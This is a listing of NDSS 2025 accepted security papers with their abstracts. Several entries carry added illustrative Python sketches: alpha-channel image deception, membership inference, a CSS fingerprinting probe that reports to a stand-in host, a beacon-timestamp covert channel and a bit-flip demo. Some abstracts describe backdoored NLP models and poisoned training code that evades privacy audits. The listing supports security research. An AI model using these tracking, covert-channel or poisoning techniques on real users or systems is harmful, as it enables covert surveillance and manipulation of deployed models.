NDSS Symposium 2025 Accepted Papers

The following papers from the summer cycle are currently accepted for NDSS Symposium 2025.

Summer Cycle

A Key-Driven Framework for Identity-Preserving Face Anonymization
Miaomiao Wang (School of Communication and Information Engineering, Shanghai University, China); Guang Hua (Infocomm Technology Cluster, Singapore Institute of Technology, Singapore); Sheng Li (School of Computer Science, Fudan University, China); Guorui Feng (School of Communication and Information Engineering, Shanghai University, China)

Abstract: Virtual faces are crucial content in the metaverse. Recently, attempts have been made to generate virtual faces for privacy protection. Nevertheless, these virtual faces either permanently remove the identifiable information or map the original identity into a virtual one, losing the original identity forever. In this study, we address the conflict between privacy and identifiability in virtual faces by proposing a key-driven face anonymization and authentication recognition (KFAAR) framework. Concretely, the KFAAR framework consists of a head posture-preserving virtual face generation (HPVFG) module and a key-controllable virtual face authentication (KVFA) module. The HPVFG module uses a user key to project the latent vector of the original face into a virtual one and then maps the virtual vector to an extended encoding, from which the virtual face is generated. A head posture and facial expression correction module further ensures that the virtual face retains the same head posture and facial expression as the original face. For authentication, the KVFA module directly recognizes virtual faces given the correct user key, recovering the original identity without exposing the original face image. We also propose a multi-task learning objective to train HPVFG and KVFA. Extensive experiments demonstrate the advantages of the proposed HPVFG and KVFA modules, which effectively achieve both facial anonymity and identifiability.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Usable security and privacy


A Method to Facilitate Membership Inference Attacks in Deep Learning Models
Zitao Chen, Karthik Pattabiraman (University of British Columbia)

Abstract: Modern machine learning (ML) ecosystems offer a surging number of ML frameworks and code repositories that can greatly facilitate the development of ML models. Today, even ordinary data holders who are not ML experts can apply off-the-shelf codebases to build high-performance ML models on their data, much of which is sensitive in nature (e.g., clinical records).

In this work, we consider a malicious ML provider who supplies model-training code to the data holders, does not have access to the training process, and has only black-box query access to the resulting model. In this setting, we demonstrate a new form of membership inference attack that is strictly more powerful than prior art. Our attack empowers the adversary to reliably de-identify all the training samples (average >99% attack TPR @0.1% FPR), and the compromised models still maintain performance comparable to their uncorrupted counterparts (average <1% accuracy drop). Moreover, we show that the poisoned models can effectively disguise the amplified membership leakage under common membership privacy auditing, which can only be revealed by a set of secret samples known by the adversary.

Overall, our study not only points to the worst-case membership privacy leakage, but also unveils a common pitfall underlying existing privacy auditing methods, which calls for future efforts to rethink the current practice of auditing membership privacy in machine learning models.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


A Systematic Evaluation of Novel and Existing Cache Side Channels
Fabian Rauscher, Carina Fiedler, Andreas Kogler, Daniel Gruss (Graz University of Technology)

Abstract: CPU caches are among the most widely studied side-channel targets, with Prime+Probe and Flush+Reload being the most prominent techniques. These generic cache attack techniques can leak cryptographic keys, user input, and are a building block of many microarchitectural attacks.

In this paper, we present the first systematic evaluation using 9 characteristics of the 4 most relevant cache attacks, Flush+Reload, Flush+Flush, Evict+Reload, and Prime+Probe, as well as three new attacks that we introduce: Demote+Reload, Demote+Demote, and DemoteContention. We evaluate hit-miss margins, temporal precision, spatial precision, topological scope, attack time, blind spot length, channel capacity, noise resilience, and detectability on recent Intel microarchitectures. Demote+Reload and Demote+Demote perform similarly to previous attacks and slightly better in some cases, e.g., Demote+Reload has a 60.7% smaller blind spot than Flush+Reload. With 15.48 Mbit/s, Demote+Reload has a 64.3% higher channel capacity than Flush+Reload. We also compare all attacks in an AES T-table attack and compare Demote+Reload and Flush+Reload in an inter-keystroke timing attack. Beyond the scope of the prior attack techniques, we demonstrate a KASLR break with Demote+Demote and the amplification of power side-channel leakage with Demote+Reload. Finally, Sapphire Rapids and Emerald Rapids CPUs use a non-inclusive L3 cache, effectively limiting eviction-based cross-core attacks, e.g., Prime+Probe and Evict+Reload, to rare cases where the victim’s activity reaches the L3 cache. Hence, we show that in a cross-core attack, DemoteContention can be used as a reliable alternative to Prime+Probe and Evict+Reload that does not require reverse-engineering of addressing functions and cache replacement policy.

Topics: Security for cloud/edge computing; Trustworthy computing software and hardware to secure networks and systems


AlphaDog: No-Box Camouflage Attacks via Alpha Channel Oversight
Qi Xia, Qian Chen (University of Texas at San Antonio)

Abstract: Traditional black-box adversarial attacks on computer vision models face significant limitations, including intensive querying requirements, time-consuming iterative processes, a lack of universality, and low attack success rates (ASR) and confidence levels (CL) due to subtle perturbations. This paper introduces AlphaDog, an Alpha channel attack, the first universally efficient targeted no-box attack, exploiting the often overlooked Alpha channel in RGBA images to create visual disparities between human perception and machine interpretation, efficiently deceiving both. Specifically, AlphaDog maliciously sets the RGB channels to represent the desired object for AI recognition, while crafting the Alpha channel to create a different perception for humans when blended with a standard or default background color of digital media (thumbnail or image viewer apps). Leveraging differences in how AI models and human vision process transparency, AlphaDog outperforms existing adversarial attacks in four key ways: (i) as a no-box attack, it requires zero queries; (ii) it achieves highly efficient generation, taking milliseconds to produce arbitrary attack images; (iii) AlphaDog can be universally applied, compromising most AI models with a single attack image; (iv) it guarantees 100% ASR and CL. The assessment of 6,500 AlphaDog attack examples across 100 state-of-the-art image recognition systems demonstrates AlphaDog’s effectiveness, and an IRB-approved experiment involving 20 college-age participants validates AlphaDog’s stealthiness. AlphaDog can be applied in data poisoning, evasion attacks, and content moderation. Additionally, a novel pixel-intensity histogram-based detection method is introduced to identify AlphaDog, achieving 100% effectiveness in detecting and protecting computer vision models against AlphaDog. Demos are available on the AlphaDog website.
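For intuition only (an illustrative sketch, not the authors' tool): the alpha-compositing effect that an attack like AlphaDog relies on can be reproduced with standard "over" blending. The RGB channels carry the content an alpha-oblivious model pipeline sees, while a near-transparent alpha channel makes a viewer that composites over a white background show something different. All shapes and pixel values below are hypothetical.

```python
import numpy as np

H, W = 224, 224

# RGB channels: the content a model that ignores alpha will "see"
# (a solid mid-gray square stands in for the attacker-chosen object).
rgb = np.full((H, W, 3), 128, dtype=np.uint8)

# Alpha channel: nearly transparent, so a viewer compositing over a white
# background renders mostly white (a different human percept).
alpha = np.full((H, W), 10, dtype=np.uint8)
rgba = np.dstack([rgb, alpha])

def composite_over(rgba_img, background=(255, 255, 255)):
    """Standard 'over' alpha compositing, as an image viewer would render it."""
    a = rgba_img[..., 3:4].astype(np.float32) / 255.0
    fg = rgba_img[..., :3].astype(np.float32)
    bg = np.array(background, dtype=np.float32)
    return (fg * a + bg * (1.0 - a)).astype(np.uint8)

human_view = composite_over(rgba)   # what a person sees in a viewer
model_view = rgba[..., :3]          # what an alpha-oblivious pipeline sees

print("mean pixel seen by humans:", human_view.mean())  # close to white (~250)
print("mean pixel seen by model :", model_view.mean())  # the RGB payload (128)
```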

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


An Empirical Study on Fingerprint API Misuse with Lifecycle Analysis in Real-world Android Apps
Xin Zhang, Xiaohan Zhang, Zhichen Liu, Bo Zhao, Zhemin Yang, Min Yang (Fudan University)

Abstract: Fingerprint-based authentication (FpAuth) is increasingly utilized by Android apps, particularly in highly sensitive scenarios such as account login and payment, as it can provide a convenient method for verifying user identity. However, the correct and secure use of Android fingerprint APIs (FpAPIs) in real-world mobile apps remains a challenge due to their complex and evolving nature.

This paper presents the first systematic empirical analysis of FpAPI misuses in Android apps from the perspective of the FpAuth lifecycle. First, we develop specialized tools to identify and analyze apps employing FpAPIs, examining their characteristics. Then we define the threat models and categorize four prevalent types of FpAPI misuses through a detailed lifecycle analysis in practical settings. Finally, we develop tools to automatically detect these misuse types in 1,333 apps that use FpAuth and find alarming results: 97.15% of them are vulnerable to at least one type of misuse, with 18.83% susceptible to all identified misuse types. The consequences of such misuses are significant, including unauthorized data access, account compromise, and even financial loss, impacting a broad user base. We have responsibly reported these vulnerabilities, resulting in the issuance of 184 CVE IDs and 19 China National Vulnerability Database (CNVD) IDs, as well as acknowledgment from 15 vendors. We hope this work can raise awareness and emphasize the importance of proper usage of FpAPIs.

Topic: Security and privacy of mobile/smartphone platforms and their operating systems


Automated Expansion of Privacy Data Taxonomy for Compliant Data Breach Notification
Yue Qin (Indiana University Bloomington & Central University of Finance and Economics); Yue Xiao (Indiana University Bloomington & IBM Research); Xiaojing Liao (Indiana University Bloomington)

Abstract: In privacy compliance research, a significant challenge lies in comparing specific data items in actual data usage practices with the privacy data defined in laws, regulations, or policies. This task is complex due to the diversity of data items used by various applications, as well as the different interpretations of privacy data across jurisdictions. To address this challenge, privacy data taxonomies have been constructed to capture relationships between privacy data types and granularity levels, facilitating privacy compliance analysis. However, existing taxonomy construction approaches are limited by manual efforts or heuristic rules, hindering their ability to incorporate new terms from diverse domains. In this paper, we present the design of GRASP, a scalable and efficient methodology for automatically constructing and expanding privacy data taxonomies. GRASP incorporates a novel hypernym prediction model based on granularity-aware semantic projection, which outperforms existing state-of-the-art hypernym prediction methods. Additionally, we design and implement Tracy, a privacy professional assistant to recognize and interpret private data in incident reports for GDPR-compliant data breach notification. We evaluate Tracy in a usability study with 15 privacy professionals, yielding high-level usability and satisfaction.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Special problems and case studies: e.g., tradeoffs between security and efficiency, usability, cost, and ethics


Be Careful of What You Embed: Demystifying OLE Vulnerabilities
Yunpeng Tian, Feng Dong, Haoyi Liu (Huazhong University of Science and Technology); Meng Xu (University of Waterloo); Zhiniang Peng (Huazhong University of Science and Technology and Sangfor Technologies Inc.); Zesen Ye (Sangfor Technologies Inc.); Shenghui Li (Huazhong University of Science and Technology); Xiapu Luo (The Hong Kong Polytechnic University); Haoyu Wang (Huazhong University of Science and Technology)

Abstract: Microsoft Office is a comprehensive suite of productivity tools, and Object Linking & Embedding (OLE) is a specification that standardizes the linking and embedding of a diverse set of objects across different applications. OLE facilitates data interchange and streamlines user experience when dealing with composite documents (e.g., an embedded Excel sheet in a Word document). However, the design of OLE presents inherent security weaknesses, as it blurs the trust boundary between first-party and third-party code, which may lead to unintended library loading and parsing vulnerabilities that could be exploited by malicious actors. Addressing this issue, this paper introduces OLExplore, a novel tool designed for security assessment of Office OLE objects. With an in-depth examination of historical OLE vulnerabilities, we have identified three key categories of vulnerabilities and subjected them to dynamic analysis and verification. Our evaluation of various Windows operating system versions has led to the discovery of 26 confirmed vulnerabilities, with 17 assigned CVE numbers that all have remote code execution potential.

Topic: Software/firmware/hardware security analysis, customization, and extensions


Black-box Membership Inference Attacks against Fine-tuned Diffusion Models
Yan Pang, Tianhao Wang (University of Virginia)

Abstract: With the rapid advancement of diffusion-based image-generative models, the quality of generated images has become increasingly photorealistic. Moreover, with the release of high-quality pre-trained image-generative models, a growing number of users are downloading these pre-trained models to fine-tune them with downstream datasets for various image-generation tasks. However, employing such powerful pre-trained models in downstream tasks presents significant privacy leakage risks. In this paper, we propose the first score-based membership inference attack framework tailored for recent diffusion models, and in the more stringent black-box access setting. Considering four distinct attack scenarios and three types of attacks, this framework is capable of targeting any popular conditional generator model, achieving high precision, evidenced by an impressive AUC of 0.95.
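As generic background (not the paper's attack framework), score-based membership inference boils down to thresholding a per-sample model score: samples on which the model scores unusually well are guessed to be training members. The sketch below uses toy data and an illustrative threshold.

```python
import numpy as np

def score_threshold_mia(scores_members, scores_nonmembers, threshold):
    """Guess 'member' when the model's loss/score on a sample is below a threshold.

    scores_*: per-sample losses obtained via black-box queries to the model.
    A lower loss on a sample is (weak) evidence that it was seen in training.
    """
    tpr = np.mean(scores_members < threshold)      # members correctly flagged
    fpr = np.mean(scores_nonmembers < threshold)   # non-members wrongly flagged
    return tpr, fpr

# Toy data: members tend to have slightly lower loss than non-members.
rng = np.random.default_rng(0)
members = rng.normal(loc=0.8, scale=0.3, size=1000)
nonmembers = rng.normal(loc=1.2, scale=0.3, size=1000)

for t in (0.6, 0.9, 1.2):
    tpr, fpr = score_threshold_mia(members, nonmembers, t)
    print(f"threshold={t:.1f}  TPR={tpr:.2f}  FPR={fpr:.2f}")
```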

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


BULKHEAD: Secure, Scalable, and Efficient Kernel Compartmentalization with PKS
Yinggang Guo (State Key Laboratory for Novel Software Technology, Nanjing University; University of Minnesota); Zicheng Wang (State Key Laboratory for Novel Software Technology, Nanjing University); Weiheng Bai (University of Minnesota); Qingkai Zeng (State Key Laboratory for Novel Software Technology, Nanjing University); Kangjie Lu (University of Minnesota)

Abstract: The endless stream of vulnerabilities urgently calls for principled mitigation to confine the effect of exploitation. However, the monolithic architecture of commodity OS kernels, like the Linux kernel, allows an attacker to compromise the entire system by exploiting a vulnerability in any kernel component. Kernel compartmentalization is a promising approach that follows the least-privilege principle. However, existing mechanisms struggle with the trade-off among security, scalability, and performance, given the challenges stemming from mutual untrustworthiness among numerous and complex components.

In this paper, we present BULKHEAD, a secure, scalable, and efficient kernel compartmentalization technique that offers bi-directional isolation for unlimited compartments. It leverages Intel’s new hardware feature PKS to isolate data and code into mutually untrusted compartments and benefits from its fast compartment switching. With mutual distrust in mind, BULKHEAD introduces a lightweight in-kernel monitor that enforces multiple important security invariants, including data integrity, execute-only memory, and compartment interface integrity. In addition, it provides a locality-aware two-level scheme that scales to unlimited compartments. We implement a prototype system on Linux v6.1 to compartmentalize loadable kernel modules (LKMs). Extensive evaluation confirms the effectiveness of our approach. In terms of system-wide impact, BULKHEAD incurs an average performance overhead of 2.44% for real-world applications with 160 compartmentalized LKMs. When focusing on a specific compartment, ApacheBench tests on the ipv6 module show an overhead of less than 2%. Moreover, the performance is almost unaffected by the number of compartments, which makes it highly scalable.

Topics: Software/firmware/hardware security analysis, customization, and extensions; Trustworthy computing software and hardware to secure networks and systems


BumbleBee: Secure Two-party Inference Framework for Large Transformers
Wen-jie Lu, Zhicong Huang (Ant Group); Zhen Gu (Alibaba Group); Jingyu Li (Ant Group and The State Key Laboratory of Blockchain and Data Security, Zhejiang University); Jian Liu (The State Key Laboratory of Blockchain and Data Security, Zhejiang University); Cheng Hong (Ant Group); Kui Ren (The State Key Laboratory of Blockchain and Data Security, Zhejiang University); Tao Wei, WenGuang Chen (Ant Group)

Abstract: Large transformer-based models have realized state-of-the-art performance on many real-world tasks such as natural language processing and computer vision. However, with the increasing sensitivity of the data and tasks they handle, privacy has become a major concern during model deployment. In this work, we focus on private inference in two-party settings, where one party holds private inputs and the other holds the model. We introduce BumbleBee, a fast and communication-friendly two-party private transformer inference system. Our contributions are three-fold: First, we propose optimized protocols for matrix multiplication, which significantly reduce communication costs by 80%–90% compared to previous techniques. Second, we develop a methodology for constructing efficient protocols tailored to the non-linear activation functions employed in transformer models. The proposed activation protocols have realized a significant enhancement in processing speed, alongside a remarkable reduction in communication costs by 80%–95% compared with two prior methods. Lastly, we have performed extensive benchmarks on five transformer models. BumbleBee demonstrates its capability by evaluating the LLaMA-7B model, generating one token in approximately 8 minutes using CPUs. Our results further reveal that BumbleBee outperforms Iron (NeurIPS22) by over an order of magnitude and is three times faster than BOLT (Oakland24) with one-tenth the communication.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Careful About What App Promotion Ads Recommend! Detecting and Explaining Malware Promotion via App Promotion Graph
Shang Ma, Chaoran Chen (University of Notre Dame); Shao Yang (Case Western Reserve University); Shifu Hou, Toby Jia-Jun Li (University of Notre Dame); Xusheng Xiao (Arizona State University); Tao Xie (Peking University); Yanfang (Fanny) Ye (University of Notre Dame)

Abstract: Android app developers frequently place app promotion ads, i.e., advertisements that promote other apps. Unfortunately, the inadequate vetting of ad content allows malicious developers to exploit app promotion ads as a new distribution channel for malware.

To help detect malware distributed via app promotion ads, in this paper, we propose a novel approach, named ADGPE, that synergistically integrates app user interface (UI) exploration with graph learning to automatically collect app promotion ads, detect malware promoted by these ads, and explain the promotion mechanisms employed by the detected malware.

Our evaluation on 18,627 app promotion ads demonstrates the substantial risks in the app promotion ecosystem. The probability of encountering malware when downloading from app promotion ads is hundreds of times higher than from Google Play. Popular ad networks such as Google AdMob, Unity Ads, and Applovin are exploited by malicious developers to spread a variety of malware: aggressive adware, rogue security software, trojans, and fleeceware. Our UI exploration technique can find 24% more app promotion ads within the same time compared to state-of-the-art techniques. We also demonstrate our technique’s usage in investigating the underground economy by collecting app promotion ads in the wild. Leveraging the found app promotion relations, our malware detection model achieves a 5.17% gain in F1 score, improving the F1 score of state-of-the-art techniques from 90.14% to 95.31%. Our malware detection model also detects 28 apps that were initially labeled as benign apps by VirusTotal but were labeled by it as malware/potentially unwanted apps (PUAs) six months later. Our path inference model unveils two malware promotion mechanisms: custom-made ad-based promotion via hardcoded ads and ad library-based promotion via interactions with ad servers (e.g., AdMob and Applovin). These findings uncover the critical security risks of app promotion ads and demonstrate the effectiveness of ADGPE in combining dynamic program analysis with graph learning to study the app promotion ad-based malware distribution.

Topic: Anti-malware techniques: detection, analysis, and prevention


Cascading Spy Sheets: Exploiting the Complexity of Modern CSS for Email and Browser Fingerprinting
Leon Trampert, Daniel Weber, Lukas Gerlach, Christian Rossow, Michael Schwarz (CISPA Helmholtz Center for Information Security)

Abstract: In an attempt to combat user tracking, both privacy-aware browsers (e.g., Tor) and email applications usually disable JavaScript. This effectively closes a major angle for user fingerprinting. However, recent findings hint at the potential for privacy leakage through selected Cascading Style Sheets (CSS) features. Nevertheless, the full fingerprinting potential of CSS remains unknown, and it is unclear if attacks apply to more restrictive settings such as email.

In this paper, we systematically investigate the modern dynamic features of CSS and their applicability for script-less fingerprinting, bypassing many state-of-the-art mitigations. We present three innovative techniques based on fuzzing and templating that exploit nuances in CSS container queries, arithmetic functions, and complex selectors. This allows us to infer detailed application, OS, and hardware configurations at high accuracy. For browsers, we can distinguish 97.95% of 1176 tested browser-OS combinations. Our methods also apply to email applications – as shown for 8 out of 21 tested web, desktop or mobile email applications. This demonstrates that fingerprinting is possible in the highly restrictive setting of HTML emails and expands the scope of tracking beyond traditional web environments.
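For intuition, script-less CSS probing can be illustrated with a simpler, well-known pattern: template a style sheet in which each conditional rule fetches a distinct URL, so the server learns the client's feature support from which requests arrive. The sketch below is illustrative only; the endpoint and feature list are hypothetical, it assumes the page contains one hidden element per probe, and it does not reproduce the paper's container-query, arithmetic-function, or complex-selector techniques.

```python
# Generate a probe style sheet: each @supports rule applies only if the client
# understands the tested declaration, and applying it fetches a unique URL.
PROBE_ENDPOINT = "https://probe.example.com/hit"   # hypothetical collection server

FEATURE_TESTS = {
    "container-queries": "container-type: inline-size",
    "color-mix": "color: color-mix(in srgb, red 50%, blue)",
    "subgrid": "grid-template-columns: subgrid",
}

def build_probe_css(client_id: str) -> str:
    rules = []
    for name, decl in FEATURE_TESTS.items():
        # @supports applies its body only if the declaration parses, so the
        # background image (and therefore the HTTP request) is conditional.
        rules.append(
            f"@supports ({decl}) {{\n"
            f"  #probe-{name} {{ background-image: url('{PROBE_ENDPOINT}?c={client_id}&f={name}'); }}\n"
            f"}}"
        )
    return "\n".join(rules)

print(build_probe_css("visitor-42"))
```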

In response to these and potential future CSS-based tracking capabilities, we propose two defense mechanisms that eliminate the root causes of privacy leakage. For browsers, we propose to preload conditional resources, which eliminates feature-dependent leakage. For the email setting, we design an email proxy service that retains privacy and email integrity while largely preserving feature compatibility. Our work provides new insights and solutions to the ongoing privacy debate, highlighting the importance of robust defenses against emerging tracking methods.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


CENSOR: Defense Against Gradient Inversion via Orthogonal Subspace Bayesian Sampling
Kaiyuan Zhang, Siyuan Cheng, Guangyu Shen, Bruno Ribeiro, Shengwei An (Purdue University); Pin-Yu Chen (IBM Research); Xiangyu Zhang, Ninghui Li (Purdue University)

Abstract: Federated learning collaboratively trains a neural network on a global server, where each local client receives the current global model weights and sends back parameter updates (gradients) based on its local private data. The process of sending these model updates may leak the client’s private data. Existing gradient inversion attacks can exploit this vulnerability to recover private training instances from a client’s gradient vectors. Recently, researchers have proposed advanced gradient inversion techniques that existing defenses struggle to handle effectively. In this work, we present a novel defense tailored for large neural network models. Our defense capitalizes on the high dimensionality of the model parameters to perturb gradients within a subspace orthogonal to the original gradient. By leveraging cold posteriors over orthogonal subspaces, our defense implements a refined gradient update mechanism. This enables the selection of an optimal gradient that not only safeguards against gradient inversion attacks but also maintains model utility. We conduct comprehensive experiments across three different datasets and evaluate our defense against various state-of-the-art attacks and defenses.
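The orthogonal-projection step at the heart of such a defense can be sketched in a few lines: draw random noise, remove its component along the gradient, and add what remains. This is only an illustration of perturbing within the orthogonal subspace, not the paper's full Bayesian sampling procedure.

```python
import numpy as np

def perturb_orthogonal(grad: np.ndarray, scale: float, rng=None) -> np.ndarray:
    """Add noise restricted to the subspace orthogonal to the gradient.

    Removing the noise component parallel to the gradient hides the exact
    gradient values while leaving its projection onto its own direction intact.
    """
    if rng is None:
        rng = np.random.default_rng()
    g = grad.ravel().astype(np.float64)
    noise = rng.normal(size=g.shape)
    noise -= (noise @ g) / (g @ g + 1e-12) * g   # project out the parallel part
    return (g + scale * noise).reshape(grad.shape)

grad = np.random.randn(1000)
protected = perturb_orthogonal(grad, scale=0.5)
# The added perturbation is (numerically) orthogonal to the original gradient:
print(abs((protected - grad) @ grad))   # ~0
```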

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


CHAOS: Exploiting Station Time Synchronization in 802.11 Networks
Sirus Shahini, Robert Ricci (University of Utah)

Abstract: Many locations, especially in urban areas, are quite noisy with WiFi traffic. In addition to data traffic, WiFi stations send management and control frames that can easily exceed several hundred frames per second just in one small area. These WiFi environments present the opportunity to transmit data by hiding it within noise components that occur as normal parts of benign transmissions. In this paper, we show how one particular feature of WiFi, the Timing Synchronization Function (TSF), can be exploited to create a fertile and robust channel for embedding secret signals. We take advantage of the fact that there is always some degree of imprecision reflected in the time synchronization of WiFi stations.

We present CHAOS, a new covert channel strategy to embed data bits in WiFi beacon frames using unmodified standard WiFi hardware. CHAOS makes use of the noise properties inherent in WiFi in two ways: First, it encodes information in the ordering of beacon frames, taking advantage of the fact that there is no natural or required ordering of beacons. Second, it makes use of a timing channel in the form of the TSF timestamp in management headers, imitating the natural imprecision of timing in real base stations to encode data in a way that is statistically similar to unmodified frames. CHAOS’s parameters can be adjusted to configure the data rate, covert channel stability, and frame miss rate; using our suggested settings, it is able to robustly broadcast secret data at 520 bits/s. We also show that TSF has substantial potential for further exploitation, sketching a correlation attack that uses it to map clients to base stations.
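As a toy illustration of a timestamp-based channel (not CHAOS's actual encoding, which also uses beacon ordering and statistically mimics real jitter), one bit per beacon can be hidden in the parity of the low-order microseconds of a TSF-style timestamp:

```python
# Illustrative only: a one-microsecond nudge per beacon stays well inside the
# timing imprecision real stations already exhibit.
def encode_bit(tsf_us: int, bit: int) -> int:
    """Nudge the timestamp by at most 1 microsecond so its parity encodes `bit`."""
    return tsf_us if tsf_us % 2 == bit else tsf_us + 1

def decode_bit(tsf_us: int) -> int:
    return tsf_us % 2

# Sender: beacon timestamps (microseconds) carrying a 4-bit secret.
beacon_tsf = [1_000_102_400, 1_000_204_811, 1_000_307_193, 1_000_409_598]
secret = [1, 0, 1, 1]
stego_tsf = [encode_bit(t, b) for t, b in zip(beacon_tsf, secret)]

# Receiver: recover the bits from the observed beacon timestamps.
assert [decode_bit(t) for t in stego_tsf] == secret
```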

Topics: Mobile and wireless network security; Network security policy implementation, deployment, and management


CLIBE: Detecting Dynamic Backdoors in Transformer-based NLP Models
Rui Zeng, Xi Chen, Yuwen Pu, Xuhong Zhang, Tianyu Du, Shouling Ji (Zhejiang University)

Abstract: Backdoors can be injected into NLP models to induce misbehavior when the input text contains a specific feature, known as a trigger, which the attacker secretly selects. Unlike fixed tokens, words, phrases, or sentences used in the static text trigger, dynamic backdoor attacks on NLP models design triggers associated with abstract and latent text features (e.g., style), making them considerably stealthier than traditional static backdoor attacks. However, existing research on NLP backdoor detection primarily focuses on defending against static backdoor attacks, while research on detecting dynamic backdoors in NLP models remains largely unexplored.

This paper presents CLIBE, the first framework to detect dynamic backdoors in Transformer-based NLP models. At a high level, CLIBE injects a “few-shot perturbation” into the suspect Transformer model by crafting an optimized weight perturbation in the attention layers to make the perturbed model classify a limited number of reference samples as a target label. Subsequently, CLIBE leverages the generalization capability of this “few-shot perturbation” to determine whether the original suspect model contains a dynamic backdoor. Extensive evaluation on three advanced NLP dynamic backdoor attacks, two widely-used Transformer frameworks, and four real-world classification tasks strongly validates the effectiveness and generality of CLIBE. We also demonstrate the robustness of CLIBE against various adaptive attacks. Furthermore, we employ CLIBE to scrutinize 49 popular Transformer models on Hugging Face and discover one model exhibiting a high probability of containing a dynamic backdoor. We have contacted Hugging Face and provided detailed evidence of the backdoor behavior of this model. Moreover, we show that CLIBE can be easily extended to detect backdoor text generation models (e.g., GPT-Neo-1.3B) that are modified to exhibit toxic behavior. To the best of our knowledge, CLIBE is the first framework capable of detecting backdoors in text generation models without requiring access to trigger input test samples. The code is available at https://github.com/Raytsang123/CLIBE.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Compiled Models, Built-In Exploits: Uncovering Pervasive Bit-Flip Attack Surfaces in DNN Executables
Yanzuo Chen, Zhibo Liu, Yuanyuan Yuan (The Hong Kong University of Science and Technology); Sihang Hu, Tianxiang Li (Huawei Technologies); Shuai Wang (The Hong Kong University of Science and Technology)

Abstract: Recent research has shown that bit-flip attacks (BFAs) can manipulate deep neural networks (DNNs) via DRAM Rowhammer exploitations. For high-level DNN models running on deep learning (DL) frameworks like PyTorch, extensive BFAs have been conducted to flip bits in model weights and shown effective. Defenses have also been proposed to guard model weights. Nevertheless, DNNs are increasingly compiled into DNN executables by DL compilers to leverage hardware primitives. These executables manifest new and distinct computation paradigms, and we find that existing research fails to accurately capture and expose the attack surface of BFAs on DNN executables.
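To see why single-bit corruption is so powerful, the sketch below flips one exponent bit of an IEEE-754 float32, the basic primitive of the weight-oriented BFAs described above (the paper's structure-based attacks target the executable's code instead). The weight value is illustrative.

```python
import struct

def flip_bit(value: float, bit: int) -> float:
    """Flip one bit (0 = least significant) of a float32 and reinterpret it."""
    (bits,) = struct.unpack("<I", struct.pack("<f", value))
    (flipped,) = struct.unpack("<f", struct.pack("<I", bits ^ (1 << bit)))
    return flipped

w = 0.125                          # a typical small model weight
# Bit 30 is the most significant exponent bit of an IEEE-754 float32.
print(w, "->", flip_bit(w, 30))    # 0.125 -> ~4.25e+37, a catastrophic weight value
```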

To this end, we launch the first systematic study of BFAs on DNN executables and reveal new attack surfaces neglected or underestimated in previous work. Specifically, prior BFAs in DL frameworks are limited to attacking model weights and assume a strong whitebox attacker with full knowledge of victim model weights, which is unrealistic as weights are often confidential. In contrast, we find that BFAs on DNN executables can achieve high effectiveness by exploiting the model structure (usually stored in the executable code), which only requires knowing the (often public) model structure. Importantly, such structure-based BFAs are pervasive, transferable, and more severe (e.g., single-bit flips lead to successful attacks) in DNN executables; they also slip past existing defenses.

To realistically demonstrate the new attack surfaces, we assume a weak and more realistic attacker with no knowledge of victim model weights. We design an automated tool to identify vulnerable bits in victim executables with high confidence (70% compared to the baseline 2%). Launching this tool on DDR4 DRAM, we show that only 1.4 flips on average are needed to fully downgrade the accuracy of victim executables, including quantized models which could require 23× more flips previously, to random guesses. We comprehensively evaluate 16 DNN executables, covering three large-scale DNN models trained on three commonly-used datasets compiled by the two most popular DL compilers. Our finding calls for incorporating security mechanisms in future DNN compilation toolchains.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Cross-Origin Web Attacks via HTTP/2 Server Push and Signed HTTP Exchange
Pinji Chen (Tsinghua University); Jianjun Chen (Tsinghua University and Zhongguancun Laboratory); Mingming Zhang (Zhongguancun Laboratory); Qi Wang, Yiming Zhang, Mingwei Xu, Haixin Duan (Tsinghua University)

Abstract: In this paper, we investigate the security implications of HTTP/2 server push and signed HTTP exchange (SXG) on the Same-Origin Policy (SOP), a fundamental web security mechanism designed to prevent cross-origin attacks. We identify a vulnerability introduced by these features, where the traditional strict SOP origin based on URI is undermined by a more permissive HTTP/2 authority based on the SubjectAlternativeName (SAN) list in the TLS certificate. This relaxation of origin constraints, coupled with the prevalent use of shared certificates among unrelated domains, poses significant security risks, allowing attackers to bypass SOP protections. We introduce two novel attack vectors, CrossPUSH and CrossSXG, which enable an off-path attacker to execute a wide range of cross-origin web attacks, including arbitrary cross-site scripting (XSS), cookie manipulation, and malicious file downloads, across all domains listed in a shared certificate. Our investigation reveals the practicality and prevalence of these threats, with our measurements uncovering vulnerabilities in widely-used web browsers such as Chrome and Edge, and notable websites including Microsoft. We responsibly disclose our findings to affected vendors and receive acknowledgments from Huawei, Baidu, Microsoft, etc.
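The underlying observation about shared certificates can be checked directly: every DNS name in a certificate's SubjectAlternativeName list is mutually authoritative under HTTP/2 connection reuse. Below is a minimal sketch for listing a server's SAN entries using Python's standard library; the hostname is a placeholder and network access is required.

```python
import socket
import ssl

def san_dns_names(hostname: str, port: int = 443) -> list[str]:
    """Fetch a server's TLS certificate and return the DNS names in its SAN list."""
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    return [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]

# Every name returned here shares one certificate; under HTTP/2 connection reuse
# they are all treated as authoritative for one another, which is the relaxation
# that CrossPUSH/CrossSXG build on.
print(san_dns_names("example.com"))
```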

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


Delay-allowed Differentially Private Data Stream Release
Xiaochen Li (University of Virginia); Zhan Qin, Kui Ren (Zhejiang University); Chen Gong (University of Virginia); Shuya Feng, Yuan Hong (University of Connecticut); Tianhao Wang (University of Virginia)

